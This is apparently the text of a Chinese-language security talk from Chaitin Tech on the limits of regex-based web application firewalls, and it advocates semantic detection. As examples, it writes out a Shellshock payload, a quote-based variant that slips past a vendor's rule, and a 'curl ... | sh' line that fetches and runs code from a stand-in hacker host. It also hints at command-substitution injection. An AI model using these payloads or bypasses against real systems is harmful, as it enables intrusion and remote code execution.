zTrix 长亭科技 论WAF的新玩法 什么是WAF？  Web应用防火墙的简称（Web Application Firewall）  形态多样：硬件WAF、云WAF、主机安全卫士等  厂商众多：  阿里、百度、腾讯、360都有云WAF布局  安恒、天融信、启明星辰、绿盟、山石网科、WebRAY、安信华等厂商占据硬件WAF主导地位  Gartner 象限：Imperva 独占鳌头 Web应用层攻击的特点  Web层面攻击牵涉范围广  几乎所有企业都面临Web应用层攻击的威胁  Web应用层涉及的技术种类繁多，不同技术面临不同攻击威胁，甚至框架本身可能 有严重漏洞  乌云曝出的绝大多数漏洞都属于 Web 应用层漏洞  Web应用层攻击技术变化快  旧类型的漏洞仍然在不断曝出新花样：SQL注入、XSS跨站脚本至今仍然非常常见  新型漏洞也层出不穷：Struts2代码注入漏洞、ImageMagick命令注入漏洞等，很 难防御  不同技术或漏洞类型结合甚至可以拓展攻击面：如 Gopher 协议在漏洞利用的作用 WAF的悲哀 传统WAF的痛点  传统WAF产品依赖规则（正则表达式匹配）来进行Web攻击防御  规则维护麻烦，且容易出错；规则越多速度也越慢（开启JIT仍然不够理想）  误报率和漏报率都很高  难以跟踪未知漏洞  传统硬件WAF产品主要以单台设备形式部署  难以处理大数据大流量  单点失效存在风险（有互备方案的除外）  需要专业安全运维人员进行管理  单点边界WAF产品无法形成安全的正向循环  未来是感知、监测与快速响应的时代，边界拦截永远会有漏洞  阻挡攻击永远只是临时方案，修复漏洞才是最安全的途径  绚丽的报表不能带来实质的用处，有效的信息与风险分析才能带来决策支持 新时代的WAF应该怎么玩？  云WAF至少解决了以下两个痛点问题：  处理大流量、大数据，良好的水平扩展性  客户无需自行维护规则，减少客户的安全运维压力，降低出错风险  但是仍然有以下诸多问题都需要更好的解决方案：  基于规则的拦截很难同时达到低误报+低漏报  基于规则永远只能跟踪漏洞应急响应，不能应对未知威胁  作为边界无状态防护，WAF不可能完美，总有被突破的时候，一旦被突破，WAF就 无能为力 新时代的WAF应该怎么玩？ 三点趋势预测： 1. 精细化处理的基于语义理解的检测引擎会逐渐代替传统规则集 2. 逐渐抛弃边界护城河一劳永逸的想法，拥抱感知、监测与快速响应 3. WAF也参与到安全产品全面动态联防，形成立体防御体系 维护规则的困难 举例：2014 年影响范围很广的 shellshock 漏洞 $ env x='() { :;}; echo vulnerable' bash -c 'echo hello' 右边防御措施来自 某网络安全大厂官 方网站，并且是原 创发布，转载须注 明来源 维护规则困难——举例：shellshock 然而，Bash 有这样的特性： 维护规则困难——举例：shellshock 只需要多加点引号即可轻松绕过 $ env x='('') { :;}; echo vulnerable' bash -c 'echo hello' 运行结果如下： 维护规则困难——举例：shellshock 那么，修改规则，使用正则表达式禁止引号？ 维护规则困难——举例：shellshock 首先，引号也要分单引号、双引号、反引号 其次，引号还可能有所嵌套；引号可以出现在任意位置 此外，还可以放 ${XX} 这样的空变量来当占位符 现在，还能写出来能防止各种绕过的规则吗？ 维护规则困难——再举例 以下是来自某比赛的某个图片上传服务，同时使用一个黑名单和一个白名单来限制命令执行， 原意猜测是防止选手获得 shell 维护规则困难——再举例 同样的，限制太死板，多种方式可以绕过： 方案一： $ curl http://hacker-website.org/my.html | sh 方案二：万能的引号 方案三：... 还是命令拼接 一个思考题： 如果 bash 命令拼接禁止掉以下符号和不可见字符（包括空格和换行），还有可能 造成命令注入吗？ ; ` & | > ? { } [ ] 假设命令是这样的： $ echo _user_input_here_ 还是命令拼接 思考题的答案之一：Command Substitution 基于正则的规则为什么这么难？ 正则表达式的本质：有限状态自动机 https://en.wikipedia.org/wiki/Finite-state_machine  在 Chomsky Hierarchy 中，有限状态自动机（正则语言）对应的是 Type-3 Grammar，是表达能力最低的一级（图灵机对应的是 Type-0 Grammer，是 最强的）  现实世界中，关于漏洞的建模用最复杂的模型都不为过，然而正则表达式却连 括号匹配这么简单的事情都做不了（括号匹配至少需要下推自动机才能处理）  甚至在 BlackHat 2005, Hansan 和 Patterson 从理论上证明了基于正则的规 则系统一定会存在误报或者漏报 (链接： http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-HansenPatterson/HP2005.pdf) 如何不再依赖规则进行攻击检测？ 2015年上半年，长亭完成 SQLChop，证明了针对 SQL 注入的语义分析是可行的 （阿里安全峰会、BlackHat Arsenal都做了展示） 2015年下半年，XSSChop 也顺利完成，实现了 XSS 的精细化语义分析 进一步实践证明，PHP代码注入、PHP反序列化、Java反序列化等都可以进行语义 分析，获得更好的检测结果 除此之外，多家厂商也都在语义分析的方法上有所突破